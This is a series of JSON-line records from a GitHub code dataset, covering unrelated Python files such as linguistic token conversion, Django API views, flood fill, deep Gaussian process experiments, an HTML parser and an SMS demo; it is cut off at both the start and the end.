0.0\n\n","repo_name":"Theyearling/About_Apollo","sub_path":"CarSimData/Extensions/Python/steercontrol.py","file_name":"steercontrol.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27895421341","text":"#!/usr/bin/env python3\n\nimport os\n\nimport itertools\n\nimport codecs\nimport glob\nfrom lingpy import ipa2tokens, tokens2class\n\n\ndef read_ipa_to_asjp(\n filename=os.path.join(os.path.dirname(__file__), \"../data\",\n \"ipa2asjp.txt\")):\n \"\"\"Read a SSV mapping IPA symbols to ASJP classes.\"\"\"\n ipa_to_asjp = {}\n\n f = codecs.open(filename, \"r\", encoding=\"utf-8\")\n\n for line in f:\n line = line.replace(\"\\n\", \"\")\n line = line.replace(\"\\r\", \"\")\n ipa, asjp = line.split(\" \")\n ipa_to_asjp[ipa] = asjp\n f.close()\n return ipa_to_asjp\n\n\nipa_to_asjp = read_ipa_to_asjp()\n\n\ndef tokenize_word_reversibly(ipa):\n \"\"\"Reversibly convert an IPA string into a list of tokens.\n\n In contrast to LingPy's tokenize_word, do this without removing\n symbols. This means that the original IPA string can be recovered\n from the tokens.\n\n \"\"\"\n tokenized_word = ipa2tokens(\n ipa, merge_vowels=False, merge_geminates=False)\n token = 0\n index = 0\n for i in ipa:\n try:\n tokenized_word[token][index]\n except IndexError:\n token += 1\n index = 0\n try:\n if i != tokenized_word[token][index]:\n if index == 0:\n tokenized_word.insert(token, i)\n else:\n tokenized_word[token] = (\n tokenized_word[token][:index] +\n i +\n tokenized_word[token][index:])\n except IndexError:\n tokenized_word.append(i)\n index += 1\n assert ''.join(tokenized_word) == ipa\n return tokenized_word\n\n\ndef ipa2asjp(ipa):\n \"\"\"Convert an IPA string into a ASJP token string.\n\n This function tries to preserve the len of the token string.\n\n \"\"\"\n asjp_list = [t for x in tokenize_word_reversibly(ipa)\n for t, char in itertools.zip_longest(\n tokens2class(x, 'asjp'),\n \"0\")]\n assert len(''.join(asjp_list)) == len(ipa)\n return ''.join(asjp_list)\n\n\ndef ipa2sca(ipa):\n \"\"\"Convert an IPA string into a SCA token string.\n\n This function tries to preserve the len of the token string.\n\n \"\"\"\n sca_list = [t for x in tokenize_word_reversibly(ipa)\n for t, char in itertools.zip_longest(\n tokens2class(x, 'sca'),\n \"0\")]\n assert len(''.join(sca_list)) == len(ipa)\n return ''.join(sca_list)\n\n\ndef read_convert_ipa_asjp():\n \"\"\"Convert IPA IELex files to ASJP.\"\"\"\n f_trace = codecs.open(\"test_ipa2asjp.txt\", \"w\", encoding=\"utf-8\")\n for file_name in glob.iglob(\"data/*tsv\"):\n f_trace.write(file_name+\"\\n\")\n f = codecs.open(file_name, \"r\", encoding=\"utf-8\")\n fout = codecs.open(file_name+\".asjp\", \"w\", encoding=\"utf-8\")\n header = f.readline()\n fout.write(header)\n header = header.split(\"\\t\")\n for line in f:\n arr = line.split(\"\\t\")\n arr[5] = ipa2asjp(arr[5])\n fout.write(\n \"\\t\".join(arr))\n f.close()\n fout.close()\n f_trace.close()\n\n\n\nif __name__ == \"__main__\":\n read_convert_ipa_asjp()\n","repo_name":"PhyloStar/CogDetect","sub_path":"infomapcog/ipa2asjp.py","file_name":"ipa2asjp.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"31002040473","text":"#!/usr/bin/env python3\n\nimport pprint\n\nouter_list = []\nfh = open('../python_data/student_db.txt')\nlines = fh.readlines()[1:]\n\nfor line in lines:\n id, street, city, state, zip = line.split(':')\n inner_list = [id, city, state]\n outer_list.append(inner_list)\n\nprint(outer_list[0][1])\n","repo_name":"MyloTuT/IntroToPython","sub_path":"Excercise/Ex7/ex7.13.py","file_name":"ex7.13.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"39723483232","text":"from django.shortcuts import render\nfrom django.contrib.auth import authenticate, logout\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import authentication, permissions,status\nfrom .serializers import MyTokenObtainPairSerializer, ProjectsSerializer, UniversitiesSerializer, MilestonesSerializer,\tLoginSerializer, CompanySerializer, CollaborationsSerializer\n\nfrom accounts.models import User\nfrom project.models import Project, Milestones\nfrom company.models import Company\nfrom university.models import University\n# Create your views here.\n\nclass LoginView(TokenObtainPairView):\t\n\tserializer_class = MyTokenObtainPairSerializer\n\nclass Login(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef post(self, request, *args, **kwargs):\n\t\temail = request.data.get(\"email\")\n\t\tpassword = request.data.get(\"password\")\n\t\tuser = authenticate(email=email, password=password)\n\t\tif user and user.user_type == 2:\n\t\t\tdata = {\n\t\t\t\t\"message\": \"Validated\",\n\t\t\t\t\"user_id\": user.pk,\n\t\t\t\t'status': status.HTTP_200_OK\n\t\t\t}\n\t\t\treturn Response(data, status=status.HTTP_200_OK)\n\t\telse:\n\t\t\tdata = {\n\t\t\t\t\"message\": \"Invalid email or password\",\n\t\t\t\t'status': status.HTTP_401_UNAUTHORIZED\n\t\t\t}\n\t\t\treturn Response(data, status=status.HTTP_401_UNAUTHORIZED)\n\nclass PersonalDetails(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef post(self, request, *args, **kwargs):\n\t\tuser_id = request.data.get(\"user_id\")\n\t\tcompany = Company.objects.filter(admin=user_id)\n\t\tjson_object = CompanySerializer(company, many=True).data\n\t\treturn Response(json_object)\n\nclass Projects(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef post(self, request, *args, **kwargs):\n\t\tuser_id = request.data.get(\"user_id\")\n\t\tuser = User.objects.filter(pk=user_id).first()\n\t\tif user:\n\t\t\tcompany = Company.objects.filter(admin=user.pk).first()\n\t\t\tprojects = Project.objects.filter(\n\t\t\t\tdeveloped_for=company,\n\t\t\t\tis_deleted=False, \n\t\t\t\tdeveloped_by__isnull=False\n\t\t\t).order_by(\"-created_at\")\n\t\t\tjson_object = ProjectsSerializer(projects, many=True).data\n\t\t\treturn Response(json_object, status=status.HTTP_200_OK)\n\t\telse:\n\t\t\tdata = {\n\t\t\t\t\"error\": \"Invalid User ID\",\n\t\t\t\t'status': 401\n\t\t\t}\n\t\t\treturn Response(data, status=status.HTTP_401_UNAUTHORIZED)\n\nclass GetCollaborations(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef post(self, request, *args, **kwargs):\n\t\tuser_id = request.data.get(\"user_id\")\n\t\tuser = User.objects.filter(pk=user_id).first()\n\t\tif user:\n\t\t\tcompany = Company.objects.filter(admin=user.pk).first()\n\t\t\tprojects = Project.objects.filter(\n\t\t\t\tdeveloped_for=company,\n\t\t\t\tis_deleted=False, \n\t\t\t\tdeveloped_by__isnull=False\n\t\t\t).order_by(\"-created_at\")\n\t\t\tjson_object = CollaborationsSerializer(projects, many=True).data\n\t\t\treturn Response(json_object, status=status.HTTP_200_OK)\n\t\telse:\n\t\t\tdata = {\n\t\t\t\t\"error\": \"Invalid User ID\",\n\t\t\t\t'status': 401\n\t\t\t}\n\t\t\treturn Response(data, status=status.HTTP_401_UNAUTHORIZED)\n\nclass Universities(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef get(self, request, *args, **kwargs):\n\t\tuniversities = University.objects.all().order_by(\"ranking\")\n\t\tjson_object = UniversitiesSerializer(universities, many=True).data\n\t\treturn Response(json_object, status=status.HTTP_200_OK)\n\nclass GetMilestones(APIView):\n\tauthentication_classes = []\n\tpermission_classes = []\n\n\tdef post(self, request, *args, **kwargs):\n\t\tproject_id = request.data.get(\"project_id\")\n\t\tmilestones = Milestones.objects.filter(project=project_id).order_by(\"created_at\")\n\t\tjson_object = MilestonesSerializer(milestones, many=True).data\n\t\treturn Response(json_object, status=status.HTTP_200_OK)","repo_name":"murtahil/Career-Bridge-master","sub_path":"Career-Bridge-master/apis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9706617991","text":"from zipfile import ZipFile\nimport os\nfrom os.path import basename\n\nclass ComalaZipcode():\n\n def __init__(self, zipname, pathtozip):\n with ZipFile(zipname, 'w') as zipObj:\n for folderName, subfolders, filenames in os.walk(pathtozip):\n for filename in filenames:\n filePath = os.path.join(folderName, filename)\n zipObj.write(filePath, basename(filePath))\n","repo_name":"Krakoslabs/lambda-node","sub_path":"cdk/python/comala_classes/zipcode.py","file_name":"zipcode.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17750925625","text":"from unittest import TestCase\nfrom src.two_heaps import (\n MedianOfAStream,\n SlidingWindowMedian,\n SlidingWindowMedianSol\n)\n\n\nclass TestTwoHeaps(TestCase):\n\n def test_median_of_a_stream(self):\n stream = MedianOfAStream()\n\n stream.insert_num(3)\n stream.insert_num(1)\n self.assertEqual(stream.find_median(), 2)\n\n stream.insert_num(5)\n self.assertEqual(stream.find_median(), 3)\n\n stream.insert_num(4)\n self.assertEqual(stream.find_median(), 3.5)\n\n def test_sliding_window_median(self):\n stream = SlidingWindowMedianSol()\n\n result = stream.find_sliding_window_median([1, 2, -1, 3, 5], 2)\n self.assertEqual(result, [1.5, 0.5, 1.0, 4.0])\n\n result = stream.find_sliding_window_median([1, 2, -1, 3, 5], 3)\n self.assertEqual(result, [1.0, 2.0, 3.0])\n","repo_name":"mzperezous/grokking-the-coding-interview","sub_path":"python/tests/test_two_heaps.py","file_name":"test_two_heaps.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36515496838","text":"from category import Category\r\nimport json\r\n\r\n# This module cList.py contains class cList (category list)\r\n\r\nclass cList:\r\n def __init__(self): # constructor (all specific categories in the program are defined here\r\n self.cl = list()\r\n #self.catFileReadable = False\r\n #try:\r\n # self.readCatFile()\r\n # self.catFileReadable = True\r\n #except IOError:\r\n self.addCat('Cooling load')\r\n self.addMembertoCat('Cooling load', 'Chillers load (kWh)') # remove from sum\r\n self.addMembertoCat('Cooling load', 'Ap Sys chillers load (kWh)')\r\n self.addMembertoCat('Cooling load', 'ApHVAC chillers load (kWh)')\r\n self.addMembertoCat('Cooling load', 'ApHVAC DX cooling systems load (kWh)') # remove from sum\r\n self.addCat('Chiller energy')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC chillers energy (kWh)')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC DX cooling systems energy (kWh)') #removed\r\n self.addMembertoCat('Chiller energy', 'ApHVAC distr pumps energy (kWh)')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC heat rej fans/pumps energy (kWh)')\r\n self.addCat('Building energy')\r\n #self.addMembertoCat('Building energy', 'ApHVAC DX cooling systems energy (kWh)') # remove from sum\r\n self.addMembertoCat('Building energy', 'ApHVAC distr fans energy (kWh)')\r\n self.addMembertoCat('Building energy', 'Lights Misc. A (kWh)')\r\n self.addMembertoCat('Building energy', 'Equip Misc. H (kWh)')\r\n self.addMembertoCat('Building energy', 'Other Process (kWh)')\r\n self.addMembertoCat('Building energy', 'MEC elevators energy (kWh)')\r\n # self.addCat('Conduction Gain Breakdown')\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'Conduction gain - external walls (kWh)')#add more categories here\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'Solar gain (kWh)')\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'Conduction gain - external windows (kWh)')\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'ApHVAC chillers load (kWh)')\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'Window Cooling Load Conduction Gain (kWh)')\r\n # self.addMembertoCat('Conduction Gain Breakdown', 'Wall Cooling Load Conduction Gain (kWh)')#feature maybe tba for adding categories on UI\r\n self.saveCatFile()\r\n\r\n\r\n def addCat(self, name): # function to append a new category to the list\r\n self.cl.append(Category(name))\r\n\r\n def addMembertoCat(self, name, membername): # function to append a string 'membername' as member of category with name 'name'\r\n for x in range(len(self.cl)):\r\n if self.cl[x].name == name :\r\n self.cl[x].addMembers(membername)\r\n return\r\n\r\n def getMember(self, name):\r\n for cat in self.cl:\r\n if cat.name == name:\r\n return cat.members\r\n\r\n\r\n ## section still in progress\r\n\r\n def addDict(self, dict): # function to import category and its members from a dictionary\r\n self.cl.clear()\r\n for cat in dict:\r\n self.addCat(cat)\r\n for att in dict[cat]:\r\n self.addMembertoCat(cat, att)\r\n\r\n def extractDict(self): # function to extract from list of categories in the program to dictionary\r\n data = {}\r\n for cat in self.cl:\r\n data[cat.name] = cat.members\r\n return data\r\n\r\n def saveCatFile(self, dict = None): # function to save category data to text file\r\n if dict is None:\r\n dict = self.extractDict()\r\n with open('savecat.txt', \"wt\") as fp:\r\n json.dump(dict, fp)\r\n\r\n def readCatFile(self): # function to read a category text file to dictionary for importing to program using addDict()\r\n with open('savecat.txt', \"rt\") as fp:\r\n data = json.load(fp)\r\n self.addDict(data)\r\n #print(\"Data: %s\" % data)\r\n\r\n def resetCatFile(self):\r\n self.cl.clear()\r\n self.addCat('Cooling load')\r\n self.addMembertoCat('Cooling load', 'Chillers load (kWh)') # remove from sum\r\n self.addMembertoCat('Cooling load', 'Ap Sys chillers load (kWh)')\r\n self.addMembertoCat('Cooling load', 'ApHVAC chillers load (kWh)')\r\n self.addMembertoCat('Cooling load', 'ApHVAC DX cooling systems load (kWh)') # remove from sum\r\n self.addCat('Chiller energy')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC chillers energy (kWh)')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC DX cooling systems energy (kWh)') # removed\r\n self.addMembertoCat('Chiller energy', 'ApHVAC distr pumps energy (kWh)')\r\n self.addMembertoCat('Chiller energy', 'ApHVAC heat rej fans/pumps energy (kWh)')\r\n self.addCat('Building energy')\r\n # self.addMembertoCat('Building energy', 'ApHVAC DX cooling systems energy (kWh)') # remove from sum\r\n self.addMembertoCat('Building energy', 'ApHVAC distr fans energy (kWh)')\r\n self.addMembertoCat('Building energy', 'Lights Misc. A (kWh)')\r\n self.addMembertoCat('Building energy', 'Equip Misc. H (kWh)')\r\n self.addMembertoCat('Building energy', 'Other Process (kWh)')\r\n self.addMembertoCat('Building energy', 'MEC elevators energy (kWh)')\r\n self.saveCatFile()\r\n\r\n\r\n","repo_name":"juankosasih97/VEAttributeSelector","sub_path":"cList.py","file_name":"cList.py","file_ext":"py","file_size_in_byte":5564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21939446612","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom .flownet import resample\n\n\nclass Consistency(nn.Module):\n # Consistency loss for a pair of optical flow\n def __init__(self):\n super(Consistency, self).__init__()\n self.beta = 0.05\n self.weight = 0.001\n\n def L2_norm(self, x):\n return F.normalize(x, p=2, dim=1, eps=1e-12)#.unsqueeze(1)\n\n def forward(self, flow_fwd, flow_bwd, stage_num):\n devide = flow_fwd.get_device()\n alpha = torch.FloatTensor([1.5]).cuda(devide)\n\n bwd2fwd_flow_pyramid = resample(flow_bwd, flow_fwd)# From bwd coordinate to src coordinate\n fwd2bwd_flow_pyramid = resample(flow_fwd, flow_bwd)# From fwd coordinate to tgt coordinate\n #print(\"bwd2fwd_flow_pyramid\", bwd2fwd_flow_pyramid.size())\n fwd_diff = torch.abs(bwd2fwd_flow_pyramid + flow_fwd)# In src\n bwd_diff = torch.abs(fwd2bwd_flow_pyramid + flow_bwd)# In tgt\n #print(\"fwd_diff size = \", fwd_diff.size())\n fwd_consist_bound = self.beta * self.L2_norm(flow_fwd)\n bwd_consist_bound = self.beta * self.L2_norm(flow_bwd)\n #print(\"fwd_consist_bound = \", fwd_consist_bound.size())\n fwd_consist_bound = alpha.clone().detach()#torch.max(fwd_consist_bound, alpha).clone().detach()\n #bwd_consist_bound = torch.max(bwd_consist_bound, alpha).clone().detach()\n bwd_consist_bound = alpha.clone().detach()\n fwd_mask = (fwd_diff < fwd_consist_bound).float()# In src\n bwd_mask = (bwd_diff < bwd_consist_bound).float()# In tgt\n\n if stage_num == 2:\n flow_consistency_loss = self.weight/2 * \\\n (torch.sum(torch.mean(fwd_diff, dim=1, keepdim=True) * fwd_mask) + \\\n torch.sum(torch.mean(bwd_diff, dim=1, keepdim=True) * bwd_mask))\n #(torch.sum(torch.mean(fwd_diff, dim=1, keepdim=True))\n else:\n flow_consistency_loss = self.weight/2 * (\\\n torch.sum(torch.mean(bwd_diff, dim=1, keepdim=True)))\n return fwd_mask, bwd_mask, flow_consistency_loss\n","repo_name":"NIRteam/prediction","sub_path":"model/VPvI/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"43705003346","text":"# Below lists details all 8 possible movements\r\nrow = [-1, -1, -1, 0, 0, 1, 1, 1]\r\ncol = [-1, 0, 1, -1, 1, -1, 0, 1]\r\n\r\n\r\n# check if it is possible to go to pixel (x, y) from\r\n# current pixel. The function returns false if the pixel\r\n# has different color or it is not a valid pixel\r\ndef isSafe(M, x, y, target):\r\n return 0 <= x < len(M) and 0 <= y < len(M[0]) and M[x][y] == target\r\n\r\n\r\n# Flood fill using DFS\r\ndef floodfill(M, x, y, replacement):\r\n\r\n # get target color\r\n target = M[x][y]\r\n\r\n # replace current pixel color with that of replacement\r\n M[x][y] = replacement\r\n\r\n # process all 8 adjacent pixels of current pixel and\r\n # recur for each valid pixel\r\n for k in range(len(row)):\r\n\r\n # if the adjacent pixel at position (x + row[k], y + col[k]) is\r\n # a valid pixel and have same color as that of the current pixel\r\n if isSafe(M, x + row[k], y + col[k], target):\r\n floodfill(M, x + row[k], y + col[k], replacement)\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # matrix showing portion of the screen having different colors\r\n M = [\r\n ['Y', 'Y', 'Y', 'G', 'G', 'G', 'G', 'G', 'G', 'G'],\r\n ['Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'G', 'X', 'X', 'X'],\r\n ['G', 'G', 'G', 'G', 'G', 'G', 'G', 'X', 'X', 'X'],\r\n ['W', 'W', 'W', 'W', 'W', 'G', 'G', 'G', 'G', 'X'],\r\n ['W', 'R', 'R', 'R', 'R', 'R', 'G', 'X', 'X', 'X'],\r\n ['W', 'W', 'W', 'R', 'R', 'G', 'G', 'X', 'X', 'X'],\r\n ['W', 'B', 'W', 'R', 'R', 'R', 'R', 'R', 'R', 'X'],\r\n ['W', 'B', 'B', 'B', 'B', 'R', 'R', 'X', 'X', 'X'],\r\n ['W', 'B', 'B', 'X', 'B', 'B', 'B', 'B', 'X', 'X'],\r\n ['W', 'B', 'B', 'X', 'X', 'X', 'X', 'X', 'X', 'X']\r\n ]\r\n\r\n # start node\r\n x, y = (3, 9) # having target color = \"X\"\r\n\r\n # replacement color\r\n replacement = 'C'\r\n\r\n # replace target color with replacement color using DFS\r\n floodfill(M, x, y, replacement)\r\n\r\n # print the colors after replacement\r\n for r in M:\r\n print(r)\r\n","repo_name":"anandkrthakur/AlgorithmsEveryProgrammerShouldKnow","sub_path":"12b. Flood Fill Algorithm_UsingDFS.py","file_name":"12b. Flood Fill Algorithm_UsingDFS.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"26808556605","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_Item(object):\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(290, 75)\n Form.setMinimumSize(QtCore.QSize(0, 0))\n self.formLayout = QtWidgets.QFormLayout(Form)\n self.formLayout.setObjectName(\"formLayout\")\n self.label_3 = QtWidgets.QLabel(Form)\n self.label_3.setObjectName(\"label_3\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_3)\n self.comboBox = QtWidgets.QComboBox(Form)\n self.comboBox.setObjectName(\"comboBox\")\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.comboBox)\n self.label_4 = QtWidgets.QLabel(Form)\n self.label_4.setObjectName(\"label_4\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_4)\n self.lineEdit_2 = QtWidgets.QLineEdit(Form)\n self.lineEdit_2.setObjectName(\"lineEdit_2\")\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.lineEdit_2)\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate","repo_name":"sonochiwa/rkn-parser","sub_path":"item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33869209254","text":"from html.parser import HTMLParser\nimport re\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\n\n\nclass MyHTMLParser(HTMLParser):\n def __init__(self):\n super().__init__()\n self.in_header = False\n self.in_body = False\n self.in_p = False\n self.text = []\n self.error = False\n self.end = False\n\n def handle_starttag(self, tag, attrs):\n if tag == \"body\":\n self.in_body = True\n elif tag == \"header\":\n self.in_header = True\n elif self.in_body and tag == \"p\":\n self.in_p = True\n\n def handle_endtag(self, tag):\n if tag == \"body\":\n self.in_body = False\n elif tag == \"header\":\n self.in_header = False\n elif self.in_body and tag == \"p\" and self.in_p:\n self.in_p = False\n\n def handle_data(self, data):\n if self.in_body and not self.in_header and self.in_p and not self.end:\n if (re.search(\"[,.?!-;:\\\"'ЇїЄє ]*\", data)):\n if re.match(\"^©\", data.strip()):\n self.end = True\n else:\n self.text.append(data.strip())\n\n def get_text(self):\n return \" \".join(self.text)\n\n def get_error(self):\n return self.error\n\n\ndef prepare_data(url):\n parser = MyHTMLParser()\n try:\n response = urlopen(url)\n html_bytes = response.read()\n html = html_bytes.decode('utf-8')\n parser.feed(html)\n except UnicodeDecodeError:\n html = html_bytes.decode('windows-1251')\n parser.feed(html)\n except HTTPError:\n parser.error = True\n\n return parser\n","repo_name":"anna-maria21/diploma1","sub_path":"playground/services/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27449564688","text":"import torch\nimport tqdm\nimport gpytorch\nimport urllib.request\nimport os\nfrom math import floor\nimport pandas as pd\nimport numpy as np\nimport models.dgps as m\nfrom gpytorch.mlls import VariationalELBO, AddedLossTerm\nfrom torch.utils.data import TensorDataset, DataLoader\nfrom gpytorch.mlls import DeepApproximateMLL\nfrom sklearn.utils import shuffle\nimport scipy.stats\nfrom scipy.special import inv_boxcox\nfrom utils.metrics2 import nlpd, rmse\n\nnum_epochs = 200\nnum_samples = 10\nnum_layers = 3\n\nprint('num_epochs = ', num_epochs)\nprint('num_samples = ', num_samples)\nprint('num_layers = ', num_layers)\n\n\nfilepath = 'data/uib_2000_2010_tp.csv'\n\ndf = pd.read_csv(filepath)\ndata = torch.Tensor(df.values)\n\nX = data[:394*5,:-1]\nX = X - X.min(0)[0]\nX = 2 * (X / X.max(0)[0]) - 1\ny = data[:394*5, -1]\ny_tr, bc_param = scipy.stats.boxcox(y + 0.001)\ny_tr = torch.Tensor(y_tr)\n\nstdy_tr, _ = torch.std_mean(y_tr)\nstdy, _ = torch.std_mean(y)\n\ntrain_n = 394*4\ntrain_x = X[:train_n, :].contiguous()\ntrain_y = y[:train_n].contiguous()\n\ntest_x = X[train_n:, :].contiguous()\ntest_y = y[train_n:].contiguous()\n\nif torch.cuda.is_available():\n train_x, train_y, test_x, test_y = train_x.cuda(), train_y.cuda(), test_x.cuda(), test_y.cuda()\n\ntrain_dataset = TensorDataset(train_x, train_y)\ntrain_loader = DataLoader(train_dataset, batch_size=1024, shuffle=True)\n\n\n#### Model\nif num_layers == 2:\n model = m.DeepGP2(train_x.shape)\nif num_layers == 3:\n model = m.DeepGP3(train_x.shape)\nif num_layers == 5:\n model = m.DeepGP5(train_x.shape)\n\nif torch.cuda.is_available():\n model = model.cuda()\n\n\n#### Training\noptimizer = torch.optim.Adam([\n {'params': model.parameters()},\n], lr=0.01)\nmll = DeepApproximateMLL(VariationalELBO(model.likelihood, model, train_x.shape[-2]))\n\nepochs_iter = tqdm.tqdm(range(num_epochs), desc=\"Epoch\")\nfor i in epochs_iter:\n # Within each iteration, we will go over each minibatch of data\n minibatch_iter = tqdm.tqdm(train_loader, desc=\"Minibatch\", leave=False)\n for x_batch, y_batch in minibatch_iter:\n with gpytorch.settings.num_likelihood_samples(num_samples):\n optimizer.zero_grad()\n output = model(x_batch)\n loss = -mll(output, y_batch)\n loss.backward()\n optimizer.step()\n minibatch_iter.set_postfix(loss=loss.item())\n\n\n#### Metrics\ndef negative_log_predictive_density(test_y, predicted_mean, predicted_var):\n # Vector of log-predictive density per test point \n lpd = torch.distributions.Normal(predicted_mean, torch.sqrt(predicted_var)).log_prob(test_y)\n # return the average\n return -torch.mean(lpd)\ndef sqrt_mean_squared_error(test_y, predicted_mean):\n return torch.sqrt(torch.mean((test_y - predicted_mean)**2))\n\n\ntest_dataset = TensorDataset(test_x, test_y)\ntest_loader = DataLoader(test_dataset, batch_size=1024)\n\n#### Metrics\nmodel.eval()\ntest_dataset = TensorDataset(test_x, test_y)\ntest_loader = DataLoader(test_dataset, batch_size=1024)\n\nmodel.eval()\nwith torch.no_grad():\n pred_y, y_means, y_var, test_lls = model.predict(test_loader)\n\n# Inverse transform predictions\n# pred_y_test_tr = torch.Tensor(inv_boxcox(pred_y_test, bc_param))\n# y_mean_raw = torch.Tensor(inv_boxcox(y_means, bc_param))\n# y_var_tr = torch.Tensor(inv_boxcox(y_var + y_mean, bc_param,)) - y_mean_tr\n# test_y_raw = torch.Tensor(inv_boxcox(test_y, bc_param))\n\n## Metrics\nrmse_test = rmse(y_mean_raw, test_y_raw, stdy)\nnlpd_test = nlpd(pred_y, test_y, stdy_tr).mean()\n\nprint(f\"RMSE: {rmse_test.item()}, NLPD: {nlpd_test.item()}\")\n\ndf1 = pd.DataFrame()\ndf1['pred'] = y_means.mean(axis=0)\ndf1['var'] = np.sqrt(_y_var.mean(axis=0))\ndf1['lat'] = data[:,2]\ndf1['lon'] = data[:,1]\ndf1.to_csv('data/DGP'+ str('num_layers')+'_uib_may2000.csv')\n\n\n","repo_name":"Stansfash/nonstationary-precip","sub_path":"experiments/spatiotemporal_dgp.py","file_name":"spatiotemporal_dgp.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9189056606","text":"from CCPRestSDK import REST\nimport configparser\n\n# 主账号\naccountSid = xxxxx\n\n# 主账号Token\naccountToken = xxxxx\n\n# 应用Id\nappId = xxxx\n\n# 请求地址,格式如下,不需要http://\nserverIP = 'app.cloopen.com'\n\n# 端口\nserverPort = '8883'\n\n# REST版本号\nsoftVersion = '2013-12-26'\n\n# 流程\n# 荣联云\n# 注册\n# 创建应用\n# ACCOUNT SID\n# appid\n# AUTH TOKEN\n\n# 参数\n# 发送短信\n# @param to 手机号\n# @param datas 数据内容 格式为数组如{'12','34'} 不需要用''替换\n# @param $tempId 模板Id\n\ndef send_template_SMS(to, datas, tempId):\n # 初始化REST SDK\n rest = REST(serverIP, serverPort, softVersion)\n rest.setAccount(accountSid, accountToken)\n rest.setAppId(appId)\n\n return rest.sendTemplateSMS(to, datas, tempId)\n\n\nif __name__ == '__main__':\n # 手机号 {验证码 3分钟内有效}\n send_template_SMS(17316184506, {\"1234\", 3}, 1)\n","repo_name":"Illidan877/python","sub_path":"短信验证/YTXSDK/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14378139239","text":"from __future__ import print_function\nimport copy\nimport src.rs_model_src.ers as ers\nimport src.rs_model_src.feature_matrix_cl as feature_matrix_cl\nimport os\nimport scipy\nimport sys\nimport warnings\n\nimport numpy as np\nimport pandas as pd\n\nfrom pyfm import pylibfm\nfrom sklearn.metrics import mean_squared_error,mean_absolute_error\nfrom sklearn.externals import joblib\nfrom sklearn.model_selection import train_test_split, RandomizedSearchCV\nwarnings.filterwarnings('ignore')\n\nclass FM_RS():\n def __init__(self, data, active_users):\n self.data = data\n self.active_users = active_users\n self.n_folds=3\n self.__prepare_feature_matrix__()\n self.__preset__()\n self.__train__()\n\n def __prepare_feature_matrix__(self):\n \"\"\"\n Prepare the feature matrix (user-item-ratings matrix). \n -feature matrix which contains all unique encounters without considering the active users for the training of the recommender system\n -feature matrix pivot contains all unique encounters and the active users\n Save feature matrix, feature pivot and the list of active users. The first two can be found in '/RecSys/feature_matrix', the last can be\n located in '/RecSys/out/test/'\n \"\"\"\n #fname = r'./RecSys/feature_matrix/feature_matrix.csv'\n #if os.path.isfile(fname) :\n # self.feature_matrix = pd.read_csv(fname)\n # fname = r'./RecSys/feature_matrix/feature_matrix_pivot.csv'\n # self.feature_matrix_pivot = pd.read_csv(fname)\n #else:\n object_um = feature_matrix_cl.FeatureMatrixClass(self.data, self.active_users)\n self.feature_matrix, self.pivot = object_um.get_feature_matrix()\n 